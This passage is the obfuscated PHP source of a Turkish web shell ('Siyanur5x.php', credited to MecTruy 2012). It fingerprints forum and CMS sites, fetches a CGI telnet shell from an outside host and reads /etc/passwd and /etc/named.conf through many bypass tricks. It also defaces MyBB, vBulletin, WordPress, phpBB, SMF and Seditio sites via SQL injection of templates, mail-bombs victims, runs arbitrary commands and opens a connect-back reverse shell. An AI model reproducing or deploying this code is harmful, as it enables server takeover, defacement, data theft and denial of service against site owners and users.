'; $siteler = $_POST['siteler']; $smf = 'Powered by SMF'; $joomla = 'Joomla!'; $vbulletin = 'Powered by vBulletin'; if(!$siteler =='') { $curl = curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); $IIIIIIlIlI1I = explode(" ",$siteler); foreach ($IIIIIIlIlI1I as $IIIIIIlIlI1l) { $IIIIIIlIlI11 = trim($IIIIIIlIlI1l); curl_setopt($curl,CURLOPT_URL,$IIIIIIlIlI11); $IIIIIIlIllII =curl_exec($curl); if (eregi ($smf,$IIIIIIlIllII)) { ob_flush(); flush(); usleep(100000); echo '
smf bulundu : '.$IIIIIIlIlI11.'
'; } elseif (eregi ($joomla,$IIIIIIlIllII)) { ob_flush(); flush(); usleep(100000); echo '
joomla bulundu : '.$IIIIIIlIlI11.'
'; } elseif (eregi ($vbulletin,$IIIIIIlIllII)) { ob_flush(); flush(); usleep(100000); echo '
vbulletin bulundu : '.$IIIIIIlIlI11.'
'; } } } } if ($id=='cgitelnet') { $IIIIIIlIllI1 = '.htaccess'; $IIIIIIlIlllI = "$IIIIIIlIllI1"; $IIIIIIlIllll = fopen ($IIIIIIlIlllI ,'w') or die ('Dosya a..lamad.!'); $IIIIIIlIlll1 = 'Options FollowSymLinks MultiViews Indexes ExecCGI AddType application/x-httpd-cgi .truy AddHandler cgi-script .truy AddHandler cgi-script .truy'; fwrite ( $IIIIIIlIllll ,$IIIIIIlIlll1 ) ; fclose ($IIIIIIlIllll); $file = fopen('mectruy.truy','w+'); $IIIIIIlIll1I=file_get_contents('http://firmareklam.net/box/cgitelnet.txt'); $IIIIIIlIll1l = fwrite ($file ,$IIIIIIlIll1I); fclose($file); if ($IIIIIIlIll1l) { echo "mectruy.truy ad.nda Cgitelnet olu.turuldu.
.htaccess .truy uzant.ya destek verecek .ekilde d.zenlendi
Telnet giri. .ifresimectruy
"; } else {echo'"error"';} $IIIIIIlIll11 = chmod('mectruy.truy',0755); if ($IIIIIIlIll11 == true){ echo 'Chmod 755 olarak ayarland.'; }else{ echo 'chmod verilemedi'; } } if ($id=='configs') { ($IIIIIIlIl1II = ini_get('safe_mode') == 0) ?$IIIIIIlIl1II = 'off': die('Error: safe_mode = on'); set_time_limit(0); @$passwd = fopen('/etc/passwd','r'); if (!$passwd) {die('[-] Error : okuyamad. /etc/passwd');} $IIIIIIlIl1I1 = array(); $users = array(); $IIIIIIlIl1lI = array(); $IIIIIIIIll11 = 0; while(!feof($passwd)) { $IIIIIIIl1I11 = fgets($passwd); if ($IIIIIIIIll11 >35) { $IIIIIIlIIlll = strpos($IIIIIIIl1I11,':'); $username = substr($IIIIIIIl1I11,0,$IIIIIIlIIlll); $IIIIIIlIl1l1 = '/home/'.$username.'/public_html/'; if (($username != '')) { if (is_readable($IIIIIIlIl1l1)) { array_push($users,$username); array_push($IIIIIIlIl1I1,$IIIIIIlIl1l1); } } } $IIIIIIIIll11++; } echo '


'; if(!$_POST['siteler']==''){ echo '
koder
'; $siteler = $_POST['siteler']; $IIIIIIlI11Il = explode(" ",$siteler); foreach($IIIIIIlI11Il as $IIIIIIlI11I1) { $IIIIIIlI11lI = trim($IIIIIIlI11I1); $curl = curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_URL,$IIIIIIlI11lI); $IIIIIIlI11ll =curl_exec($curl); if(@eregi ('uname',$IIIIIIlI11ll)) { ob_flush(); flush(); usleep(100000); echo '
shell bulundu : '.$IIIIIIlI11lI.'
'; } curl_close($curl); } } } function info() {;echo '
'; ob_start () ; phpinfo () ; $IIIIIIlI111I = ob_get_contents () ; ob_end_clean () ; echo ( str_replace ( 'module_Zend Optimizer','module_Zend_Optimizer',preg_replace ( '%^.*(.*).*$%ms','$1',$IIIIIIlI111I ) ) ) ; ;echo '
'; } if ($id=='mybb'){ echo "

MyBB anasayfa mysql hack



 

Mysql Host :    Veritaban. :  
Kullan.c.      :     .ifre          :  
Index Kod
         


"; $IIIIIIlI1111 = $_POST['mybbdbh']; $IIIIIIllIIII = $_POST['mybbdbu']; $IIIIIIllIIIl = $_POST['mybbdbn']; $IIIIIIllIII1 = $_POST['mybbdbp']; $IIIIIIllIIlI = $_POST['mybbindex']; if (!empty($IIIIIIlI1111) &&!empty($IIIIIIllIIII) &&!empty($IIIIIIllIIIl) &&!empty($IIIIIIllIIlI)) { mysql_connect($IIIIIIlI1111,$IIIIIIllIIII,$IIIIIIllIII1) or die(mysql_error()); mysql_select_db($IIIIIIllIIIl) or die(mysql_error()); $IIIIIIllIIll='mybb_'; $IIIIIIllIIl1 = 'UPDATE '.$IIIIIIllIIll."templates SET template='".$IIIIIIllIIlI."' WHERE title='index'"; $IIIIIIIIl111 = mysql_query($IIIIIIllIIl1) or die (mysql_error()); echo "<******>alert('Hedef site pompaland.');"; } } if ($id=='seditio'){ echo "

Seditio News H4ck



 

Mysql Host :    VeriTaban? :  
Kullan?c?      :     ?ifre          :  
News ID     :   
Index Kod   :   

 

 

"; $IIIIIIllII1I = $_POST['xdbh']; $IIIIIIllII1l = $_POST['xdbu']; $IIIIIIllII11 = $_POST['xdbn']; $IIIIIIllIlII = $_POST['xdbp']; $IIIIIIllIlIl = $_POST['xnews']; $IIIIIIllIlI1 = $_POST['xid']; if (!empty($IIIIIIllII1I) &&!empty($IIIIIIllII1l) &&!empty($IIIIIIllII11) &&!empty($IIIIIIllIlIl)) { mysql_connect($IIIIIIllII1I,$IIIIIIllII1l,$IIIIIIllIlII) or die(mysql_error()); mysql_select_db($IIIIIIllII11) or die(mysql_error()); $IIIIIIllIllI = "UPDATE sed_pages SET page_text='".$IIIIIIllIlIl."' WHERE page_id='".$IIIIIIllIlI1."'"; $IIIIIIIIl111 = mysql_query($IIIIIIllIllI) or die (mysql_error()); } } if ($id=='vbulletin'){ echo "

Vbulletin anasayfa mysql hack



 

Mysql Host :    Veritaban. :  
Kullan.c.      :     .ifre          :  
            Index Kod
         


"; $IIIIIIllIlll='powered By MecTruy'; $dbh = $_POST['dbh']; $dbn = $_POST['dbn']; $dbu = $_POST['dbu']; $dbp = $_POST['dbp']; $index = $_POST['index']; $index=str_replace("'","'",$index); $IIIIIIllI1Il = "{\${eval(base64_decode('"; $IIIIIIllI1Il .= base64_encode("echo "$index";"); $IIIIIIllI1Il .= "'))}}{\${exit()}}"; if (!empty($dbh) &&!empty($dbn) &&!empty($dbu) &&!empty($index)) { mysql_connect($dbh,$dbu,$dbp) or die(mysql_error()); mysql_select_db($dbn) or die(mysql_error()); $IIIIIIllI1lI = "UPDATE template SET template='".$IIIIIIllI1Il.''.$IIIIIIllIlll."' WHERE title='spacer_open'"; $IIIIIIllI1ll = "UPDATE template SET template='".$IIIIIIllI1Il.''.$IIIIIIllIlll."' WHERE title='FORUMHOME'"; $IIIIIIllI1l1 = "UPDATE style SET css='".$IIIIIIllI1Il.''.$IIIIIIllIlll."', stylevars='', csscolors='', editorstyles=''"; $IIIIIIIIl111 = mysql_query($IIIIIIllI1lI) or die (mysql_error()); $IIIIIIIIl111 = mysql_query($IIIIIIllI1ll) or die (mysql_error()); $IIIIIIIIl111 = mysql_query($IIIIIIllI1l1) or die (mysql_error()); echo 'pompalandi'; } } if ($id=='wordpress'){ echo "

Wordpress mysql anasayfa hack



 

Mysql Host :    VeriTaban? :  
Kullan?c?      :     ?ifre          :  
Post ID        :  
Index Kod   :   

 

 

"; $IIIIIIllI11I = $_POST['wpdbh']; $IIIIIIllI11l = $_POST['wpdbu']; $IIIIIIllI111 = $_POST['wpdbn']; $IIIIIIlllIII = $_POST['wpdbp']; $IIIIIIlllIIl = $_POST['wppost']; $IIIIIIlllII1=$_POST['wpid']; if (!empty($IIIIIIllI11I) &&!empty($IIIIIIllI11l) &&!empty($IIIIIIllI111) &&!empty($IIIIIIlllIIl)) { mysql_connect($IIIIIIllI11I,$IIIIIIllI11l,$IIIIIIlllIII) or die(mysql_error()); mysql_select_db($IIIIIIllI111) or die(mysql_error()); $IIIIIIllIllI = "UPDATE wp_posts SET post_title='".$IIIIIIlllIIl."' WHERE ID='".$IIIIIIlllII1."'"; $IIIIIIIIl111 = mysql_query($IIIIIIllIllI) or die (mysql_error()); echo "<******>alert('Hedef WordPress Sitesi Ba?ar?l? Bir ?ekilde Bombaland? !');"; } } if ($id=='phpbb'){ echo "

Phpbb mysql anasayfa hack



 

Mysql Host :    Veritaban. :  
Kullan.c.      :     .ifre          :  
Kate ID        :  
Index Kod   :   

 

 

"; $IIIIIIlllIlI = $_POST['phpbbdbh']; $IIIIIIlllIll = $_POST['phpbbdbu']; $IIIIIIlllIl1 = $_POST['phpbbdbn']; $IIIIIIlllI1I = $_POST['phpbbdbp']; $IIIIIIlllI1l = $_POST['phpbbkat']; $IIIIIIlllII1=$_POST['katid']; if (!empty($IIIIIIlllIlI) &&!empty($IIIIIIlllIll) &&!empty($IIIIIIlllIl1) &&!empty($IIIIIIlllI1l)) { mysql_connect($IIIIIIlllIlI,$IIIIIIlllIll,$IIIIIIlllI1I) or die(mysql_error()); mysql_select_db($IIIIIIlllIl1) or die(mysql_error()); $IIIIIIllIllI = "UPDATE phpbb_categories SET cat_title='".$IIIIIIlllI1l."' WHERE cat_id='".$IIIIIIlllII1."'"; $IIIIIIIIl111 = mysql_query($IIIIIIllIllI) or die (mysql_error()); echo "<******>alert('Hedef PHPbb Sitesi Ba?ar?l? Bir ?ekilde Bombaland? !');"; } } if ($id=='smf') { echo "

SMF Kategori H4ck



 

Mysql Host :    Veritaban. :  
Kullan.c.      :     .ifre          :  
Kate ID        :  
Index Kod   :   

 

 

"; $IIIIIIlllI11 = $_POST['smfdbh']; $IIIIIIllllII = $_POST['smfdbu']; $IIIIIIllllIl = $_POST['smfdbn']; $IIIIIIllllI1 = $_POST['smfdbp']; $smf_index = $_POST['smf_index']; $IIIIIIllllll=$_POST['katid']; if (!empty($IIIIIIlllI11) &&!empty($IIIIIIllllII) &&!empty($IIIIIIllllIl) &&!empty($smf_index)) { mysql_connect($IIIIIIlllI11,$IIIIIIllllII,$IIIIIIllllI1) or die(mysql_error()); mysql_select_db($IIIIIIllllIl) or die(mysql_error()); $IIIIIIllIIll='smf_'; $IIIIIIlllll1 = 'UPDATE '.$IIIIIIllIIll."categories SET name='".$smf_index."' WHERE ID_CAT='".$IIIIIIllllll."'"; $IIIIIIIIl111 = mysql_query($IIIIIIlllll1) or die (mysql_error()); echo ""; } } if ($id=='joomla') { error_reporting(0); ini_set('max_execution_time',0); ini_set('default_socket_timeout',2); $IIIIIIllll1I = microtime(); $IIIIIIllll1I = explode(' ',$IIIIIIllll1I); $IIIIIIllll1I = $IIIIIIllll1I[1] +$IIIIIIllll1I[0]; $IIIIIIllll1l = $IIIIIIllll1I; { if(isset($_POST['baba'])) { } { print_r('

'); } print ''; $IIIIIIllll11 ='sitelerbu.txt'; touch ($IIIIIIllll11); $IIIIIIlll1Il=fopen($IIIIIIllll11,'w+'); fwrite($IIIIIIlll1Il,$_POST['liste']); fclose($IIIIIIlll1Il); $IIIIIIlll1I1 = @file ($IIIIIIllll11); if (file_exists($IIIIIIllll11) &&!empty ($IIIIIIlll1I1)){ foreach ($IIIIIIlll1I1 as $IIIIIIlll1lI =>$IIIIIIlll1ll){} for ($IIIIIIlll1l1=0;$IIIIIIlll1l1<=$IIIIIIlll1lI;$IIIIIIlll1l1++){ $IIIIIIlll11I = 'http://'.trim($IIIIIIlll1I1[$IIIIIIlll1l1]).'/index.php?option=com_user&view=reset&layout=confirm'; $IIIIIIlll11l = curl_init($IIIIIIlll11I); curl_setopt($IIIIIIlll11l,CURLOPT_RETURNTRANSFER,true); $IIIIIIlll111 = curl_exec($IIIIIIlll11l); $IIIIIIIIII11 = fopen('site.txt',w); fwrite($IIIIIIIIII11,$IIIIIIlll111); $IIIIIIll1III = (file('site.txt')); foreach ($IIIIIIll1III as $IIIIIIll1IIl =>$IIIIIIll1II1){} $IIIIIIll1IlI = "$IIIIIIlll1I1[$IIIIIIlll1l1] [A..k yok !!]"; $IIIIIIll1Ill=fopen('x.php',a); for ($IIIIIIIIll11=0;$IIIIIIIIll11<=$IIIIIIll1IIl;$IIIIIIIIll11++){ $IIIIIIll1Il1 = trim(htmlspecialchars($IIIIIIll1III[$IIIIIIIIll11])); if (preg_match("/input\sid\=.*token/",$IIIIIIll1Il1,$IIIIIIll1I1I)){$IIIIIIll1IlI="$IIIIIIlll1I1[$IIIIIIlll1l1] [A..k var !!]: "."Exploit";$IIIIIIIIll11 = $IIIIIIll1IIl; fwrite($IIIIIIll1Ill,$IIIIIIll1IlI."
"); } } print $IIIIIIll1IlI.'
'; fclose($IIIIIIll1Ill); fclose ($IIIIIIIIII11); curl_close($IIIIIIlll11l); }}else {print "$IIIIIIllll11 B.yle Bir Dosya Yok !!";} } print '


'; $IIIIIIllll1I = microtime(); $IIIIIIllll1I = explode(' ',$IIIIIIllll1I); $IIIIIIllll1I = $IIIIIIllll1I[1] +$IIIIIIllll1I[0]; $IIIIIIll1I1l = $IIIIIIllll1I; $IIIIIIll1I11 = ($IIIIIIll1I1l -$IIIIIIllll1l); printf ('i.lem %f Saniyede Tamamland..',$IIIIIIll1I11); } if ($id=='smfvbulletin') { if (!function_exists('getmicrotime')) {function getmicrotime() {list($IIIIIIll1lI1,$IIIIIIll1llI) = explode(' ',microtime());return ((float)$IIIIIIll1lI1 +(float)$IIIIIIll1llI);}} error_reporting(5); @ignore_user_abort(TRUE); @set_magic_quotes_runtime(0); $win = strtolower(substr(PHP_OS,0,3)) == 'win'; define('starttime',getmicrotime()); if (get_magic_quotes_gpc()) {if (!function_exists('strips')) {function strips(&$IIIIIIll1l11,$IIIIIIIll11l='') {if (is_array($IIIIIIll1l11)) {foreach($IIIIIIll1l11 as $IIIIIIIll11l=>$IIIIIIll11Il) {if (strtoupper($IIIIIIIll11l) != 'GLOBALS') {strips($IIIIIIll1l11["$IIIIIIIll11l"]);}}}else {$IIIIIIll1l11 = stripslashes($IIIIIIll1l11);}}}strips($GLOBALS);} $_REQUEST = array_merge($_COOKIE,$_GET,$_POST); foreach($_REQUEST as $IIIIIIIll11l=>$IIIIIIll11Il) {if (!isset($$IIIIIIIll11l)) {$$IIIIIIIll11l = $IIIIIIll11Il;}} error_reporting(0); $info = $_SERVER['SERVER_SOFTWARE']; $site = getenv('HTTP_HOST'); $page = $_SERVER['******_NAME']; $IIIIIIll11l1 = $_SERVER['SERVER_NAME']; $uname = php_uname(); $IIIIIIll111l = ini_get('safe_mode'); $IIIIIIll1111 = ini_get('disable_functions'); $IIIIIIl1IIII = $_SERVER['REMOTE_ADDR']; $IIIIIIl1IIIl = $_SERVER['SERVER_ADDR']; $IIIIIIl1III1 = phpversion(); $IIIIIIl1IIlI = realpath($_GET['chdir']).'/'; $fdel = $_GET['fdel']; $execute = $_POST['execute']; $cmd = $_POST['cmd']; $commander = $_POST['commander']; $ls = 'ls -la'; $source = $_POST['source']; $gomkf = $_POST['gomkf']; $title = $_POST['title']; $sourcego = $_POST['sourcego']; $IIIIIIl1IllI = 'tmp'; $IIIIIII1III1 = tempnam($IIIIIIl1IllI,'cx'); $fcopy = $_POST['fcopy']; $tuser = $_POST['tuser']; $user = $_POST['user']; $wdir = $_POST['wdir']; $tdir = $_POST['tdir']; $symgo = $_POST['symgo']; $sym = 'xhackers.txt'; $to = $_POST['to']; $sbjct = $_POST['sbjct']; $msg = $_POST['msg']; $header = 'From:'.$_POST['header']; if(isset($_POST['phpinfo'])) { die(phpinfo()); } if ($IIIIIIll111l) { $IIIIIIl1I1ll = 'ON(G.venlik Var)'; } else { $IIIIIIl1I1ll = 'OFF(G.venlik Yok)'; } if (''==($IIIIIIll1111)) { $IIIIIIl1I1l1 = 'Yok'; } else { $IIIIIIl1I1l1 = "$IIIIIIll1111"; } if(isset($_GET['dir']) &&is_dir($_GET['dir'])) { chdir($_GET['dir']); } $IIIIIIl1IIlI = realpath($_GET['chdir']).'/'; ;echo '
DomainsUserssymlink
'.$user['name']." symlink


'; $IIIIIIl1I11I=$_GET['id']; if($IIIIIIl1I11I==''){ echo '

 

 

Silici.PHP v1.3 Ne ??e Yarar ?

1- En Bilindik Sistemlerine Tek Hareketle Deface Etmeye Yarar..
2-C99 SQL D?zenleme Hatalar?nda Silici.PHP Devreye Girer ve Y?zde 100% Bir Ba?ar? Sa?lar..
3-Vbulletin ve MyBB gibi Forum Sistemlerine Tam Sayfa Kaynak Kodlar?n?z? Yerle?tirmeyi Sa?lar ve Sonucunda Sistemin Anasayfas? Deface Edilir..
4-Ba?ka Hi? Bir Yerde Olmayan WordPress ve Seditio Deface Etme Eklentisine Sahiptir...

h4cker.tr Der ki; Kodlar Eme?e Sayg? ?er?evesinde Gizlenmi?tir ve En iyi G?r?nt? Mozillada Vermektedir

GreetZ: GUARD_FB,dikey,By_FatiH,JaCKaL,3RqU,JNSN,rm0,xBx,s4s_7,c0derline,W1L3D4,AlpeReN,Fizilal,Forsbey,VeYasin,Cyber-Terrorist

 

 

?leti?im : h4ck@hotmail.com

 

'; } } if ($id=='pathbypass') { $IIIIIIl1I11l = '/home/'; $IIIIIIl1I111 = '/public_html/'; $IIIIIIl1lIII = shell_exec('ls /var/mail'); $IIIIIIl1lIIl = explode(" ",$IIIIIIl1lIII); foreach($IIIIIIl1lIIl as $IIIIIIl1lII1){ $IIIIIIl1lIlI = $IIIIIIl1I11l.$IIIIIIl1lII1.$IIIIIIl1I111.'
'; $IIIIIIl1lIll = ereg_replace('/home//public_html/','',$IIIIIIl1lIlI); echo $IIIIIIl1lIll; } } if ($id=='ekstraupload') { echo '
'; echo '
'; if( $_POST['_upl'] == 'Upload') { if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])) {echo 'Y.kleme ba.ar.l.

';} else {echo 'Y.kleme ba.ar.s.z

';} } } if ($id=='namedbypass') { $IIIIIIlIl1lI['groups'] = 1; $IIIIIIlIl1lI['accounts'] = array(); $IIIIIIl1lIl1['host'] = '94.73.146.248'; $IIIIIIl1lIl1['user'] = 'cihaz'; $IIIIIIl1lIl1['pass'] = '00235154'; $IIIIIIl1lIl1['db'] = 'paketleme'; $IIIIIIl1lI1I = create_function('$ext',' // function IsCallableExt($ext) // { echo "Trying via {$ext} extension..."; // Check whether this extension can be used if ( @extension_loaded($ext) ) { echo "extension loaded, trying..."; $ext = 1; // YAY, it has already been enabled! } else { echo "extension is off. Trying to load {$ext} extension..."; // We must try to enable it! if ( is_callable("dl") ) { @dl((PHP_SHLIB_SUFFIX === "dll" ? "php_" : "").$ext.".".PHP_SHLIB_SUFFIX); } // Check whether it worked if ( @extension_loaded("posix") ) { $ext = 1; // YAY, it worked! } } // } '); @ini_restore('safe_mode');@ini_set('safe_mode',0); @ini_restore('open_basedir');@ini_set('open_basedir',''); @ini_restore('disable_functions');@ini_set('disable_functions',''); if ( is_callable('ini_get') &&ini_get('error_reporting') ) { $IIIIIIlIl1lI['safe_mode'] = ini_get('safe_mode'); } echo 'Safe-Mode is '.($IIIIIIlIl1lI['safe_mode'] ?'on': 'off')."
"; echo 'Trying via backtick operator...'; if ( !$IIIIIIlIl1lI['safe_mode'] ) { $passwd = `cat /etc/named.conf`; if ( $passwd ) { die("DONE!



".nl2br($passwd)); } } echo "failed.
Trying via system()...";$IIIIIIlI1l1I = ''; if ( @system('ls',$IIIIIIlI1l1I) ) { system('cat /etc/named.conf',$passwd); if ( $passwd ) { die("DONE!



".nl2br($passwd)); } } echo "failed.
Trying via shell_exec()..."; if ( @shell_exec('ls') ) { $passwd = shell_exec('cat /etc/named.conf'); if ( $passwd ) { die("DONE!



".nl2br($passwd)); } } echo "failed.
Trying via readfile()..."; if ( @readfile('/etc/named.conf') ) { die(); } echo "failed.
Trying via file_get_contents()..."; if ( @is_readable('/etc/named.conf') ) { $passwd = file_get_contents('/etc/named.conf'); if ( $passwd ) { die("DONE!



".nl2br($passwd)); } } echo "failed.
Trying via copy()..."; if ( is_callable('copy') ) { if ( @copy('compress.zlib:///etc/named.conf',dirname($_SERVER['SCRIPT_FILENAME']).'/file.txt') ) { echo 'go to: '.dirname($_SERVER['SCRIPT_FILENAME']).'/file.txt'; } } echo "failed.
Trying via CURL..."; if ( is_callable('curl_init') &&is_callable('curl_exec') ) { $passwd = curl_init("file:///etc/named.conf ".'index.php'); if ( curl_exec($passwd) ) { var_dump(curl_exec($passwd));die(); } } echo "failed.
"; if ( $IIIIIIl1lI1I('posix') ) { echo "done.
Trying via posix_getpwuid()..."; if ( is_callable('posix_getpwuid') ) { $passwd = array(); for ( $IIIIIIIIll11=0;$IIIIIIIIll11<5000;$IIIIIIIIll11++) { $IIIIIIIIlIll = @posix_getpwuid($IIIIIIIIll11); if ( $IIIIIIIIlIll ) { $passwd[$IIIIIIIIll11] = $IIIIIIIIlIll; } } if ( count($passwd) ) { die(implode("
",$passwd)); } } echo "failed.
Trying via posix_getgrgid()..."; if ( $IIIIIIlIl1lI['groups'] &&is_callable('posix_getgrgid') ) { $passwd = array(); for ( $IIIIIIIIll11=0;$IIIIIIIIll11<5000;$IIIIIIIIll11++) { $IIIIIIIIlIll = @posix_getgrgid($IIIIIIIIll11); if ( $IIIIIIIIlIll ) { $passwd[$IIIIIIIIll11] = $IIIIIIIIlIll; } } if ( count($passwd) ) { die(implode("
",$passwd)); } } echo "failed.
Trying via posix_getpwnam()..."; if ( is_callable('posix_getpwnam') ) { $passwd = array(); foreach ( $IIIIIIlIl1lI['accounts'] as $IIIIIIl1lllI ) { $passwd[$IIIIIIl1lllI] = posix_getpwnam($IIIIIIl1lllI); } if ( count($passwd) ) { die(implode("
",$passwd)); } } echo "failed.
Trying via posix_getgrnam()..."; if ( $IIIIIIlIl1lI['groups'] &&is_callable('posix_getgrnam') ) { $passwd = array(); foreach ( $IIIIIIlIl1lI['accounts'] as $IIIIIIl1lllI ) { $passwd[$IIIIIIl1lllI] = posix_getgrnam($IIIIIIl1lllI); } if ( count($passwd) ) { die(implode("
",$passwd)); } } } echo "failed.
"; echo 'Trying via MySQL (LOCAL-INFILE)...'; if ( $IIIIIIl1lIl1['host'] &&$IIIIIIl1lIl1['user'] &&$IIIIIIl1lIl1['pass'] &&$IIIIIIl1lIl1['db'] ) { mysql_connect($IIIIIIl1lIl1['host'],$IIIIIIl1lIl1['user'],$IIIIIIl1lIl1['pass']); mysql_select_db($IIIIIIl1lIl1['db']); mysql_query('CREATE TABLE adskfjlsdjf (a varchar(1024))'); mysql_query("LOAD DATA LOCAL INFILE '/etc/named.conf' INTO TABLE adskfjlsdjf"); $IIIIIIl1llll = mysql_query('SELECT a FROM adskfjlsdjf'); if ( mysql_num_rows($IIIIIIl1llll) ) { while ( $IIIIIIl1lll1 = mysql_fetch_row($IIIIIIl1llll) ) { echo implode('',$IIIIIIl1lll1)."
"; } die(); } } echo "failed.
"; if ( $IIIIIIl1lI1I('perl') ) { $perl = new perl(); die($perl->eval("system('cat /etc/named.conf')")); } echo "failed.
"; if ( $IIIIIIl1lI1I('ionCube Loader') ) { $passwd = @ioncube_read_file('/etc/named.conf'); if ( $passwd ) { die(nl2br($passwd)); } } echo "failed.
"; if ( $IIIIIIl1lI1I('python') ) { $passwd = python_eval(" import os pwd = os.getcwd() print pwd os.system('cat /etc/named.conf') "); if ( $passwd ) { die(nl2br($passwd)); } } echo "failed.
"; echo "

Unable to read /etc/named.conf, nothing worked.
Try looking for new version at: http://dietimes.blogspot.com."; } function IIIIIIl1ll11($IIIIIIl1l1II) { $IIIIIIIlIIIl = ''; if (!empty($IIIIIIl1l1II)){ if(function_exists('exec')) { @exec($IIIIIIl1l1II,$IIIIIIIlIIIl); $IIIIIIIlIIIl = join(" ",$IIIIIIIlIIIl); } elseif(function_exists('shell_exec')) { $IIIIIIIlIIIl = @shell_exec($IIIIIIl1l1II); } elseif(function_exists('system')) { @ob_start(); @system($IIIIIIl1l1II); $IIIIIIIlIIIl = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')) { @ob_start(); @passthru($IIIIIIl1l1II); $IIIIIIIlIIIl = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($IIIIIII1ll11 = @popen($IIIIIIl1l1II,'r'))) { $IIIIIIIlIIIl = ''; while(!@feof($IIIIIII1ll11)) {$IIIIIIIlIIIl .= @fread($IIIIIII1ll11,1024);} @pclose($IIIIIII1ll11); } } return $IIIIIIIlIIIl; } $cmd=$_POST['cmd']; if($id=='cmd'){ $cmd=$_POST['cmd']; $IIIIIIIIl111=IIIIIIl1ll11("$cmd"); echo '

Geli.mi. Komut g.nderme

 



'; } if ( $id=='fake-mail'){ error_reporting(0); echo '

Fake Mail- DOS E-mail By Victim Server

'; echo "
Victim Mail :

Number-Mail :

Comments:

"; $to=$_POST['to']; $nom=$_POST['nom']; $Comments=$_POST['Comments']; if ($to <>''){ for ($IIIIIIIIll11 = 0;$IIIIIIIIll11 <$nom ;$IIIIIIIIll11++){ $IIIIIIl1l1ll = rand (71,1020000000).'@'.'Attacker.com'; $IIIIIIl1l1l1= md5("$IIIIIIl1l1ll"); mail($to,$IIIIIIl1l1l1,$Comments,"From:$IIIIIIl1l1ll"); echo "$IIIIIIIIll11 is ok"; } echo ""; } } if ($id=='cshell'){ echo "
Connect back Shell , bypass Firewalls
For user :
nc -l -p 1019


Your IP & BindPort:

"; $mip=$_POST['mip']; $bport=$_POST['bport']; if ($mip <>'') { $IIIIIIIIII11=fsockopen($mip ,$bport ,$IIIIIIl1l111,$IIIIIIl11III); if (!$IIIIIIIIII11){ $IIIIIIIIl111 = 'Error: could not open socket connection'; } else { fputs ($IIIIIIIIII11 ," ********************************************* Welcome T0 SimAttacker 1.00 ready 2 USe ********************************************* "); while(!feof($IIIIIIIIII11)){ fputs ($IIIIIIIIII11,' bash # '); $IIIIIIIIl111= fgets ($IIIIIIIIII11,4096); $IIIIIIl11IIl=`$IIIIIIIIl111`; fputs ($IIIIIIIIII11,'--> '.$IIIIIIl11IIl." "); } fclose ($IIIIIIIIII11); } } } $IIIIIIl11II1=getcwd(); $dir=realpath($_GET['dir']).'/'; if ($id=='fm'){ echo "

 Home: $IIIIIIl11II1  

 Path:

"; echo "
"; if (is_dir($dir)){ if ($IIIIIIl11IlI=opendir($dir)){ while (($file = readdir($IIIIIIl11IlI)) !== false) { $IIIIIIl11Ill=round(filesize($dir .$file)/1024); echo " "; } closedir($IIIIIIl11IlI); } } echo "
File / Folder Name Size KByte Download Edit Chmod Delete
"; if (is_dir($dir.$file)) { echo " $file dir"; } else { echo " $file "; } echo " "; if (is_file($dir.$file)) { echo "$IIIIIIl11Ill"; } else { echo '  '; } echo " "; if (is_file($dir.$file)){ if (is_readable($dir.$file)){ echo "download"; }else { echo "No ReadAble"; } }else { echo ' '; } echo " "; if (is_file($dir.$file)) { if (is_readable($dir.$file)){ echo "Edit"; }else { echo "No ReadAble"; } }else { echo ' '; } echo " "; if (strtoupper(substr(PHP_OS,0,3)) === 'WIN') { echo "Dont in windows"; } else { echo "Chmod"; } echo " Delete
Send this file:
"; } $IIIIIIl11I11=$_GET['dir']; if ($IIIIIIl11I11 <>'') { $IIIIIIl11lII = $IIIIIIl11I11.'/'.$_FILES['userfile']['name']; print '
';
if (move_uploaded_file($_FILES['userfile']['tmp_name'],$IIIIIIl11lII)) {
echo "";
echo "";
}
}
$IIIIIIl11lIl=$_GET['fdelete'];
if ($IIIIIIl11lIl <>'') {
if (is_dir($IIIIIIl11lIl)){
$IIIIIIl11lI1 = glob($IIIIIIl11lIl .'/*.*');
if ( is_array ( $IIIIIIl11lI1 ) ) {
foreach ( $IIIIIIl11lI1 as $IIIIIIIIIIII) {
unlink ($IIIIIIIIIIII);
rmdir("$IIIIIIl11lIl");
echo "";
echo "";
}
}
}
else{
echo "";
unlink ("$IIIIIIl11lIl");
echo "";
exit(0);
}
}
;echo '
';
$IIIIIIl11l1I = $_GET['id'];
switch ($IIIIIIl11l1I) {
case 'info':
info ();
break;
case 'ZoneH':
ZoneH ();
}
;echo '
			

			


Coded by MecTruy 2012 Siyanur5x.php bypass shell
';;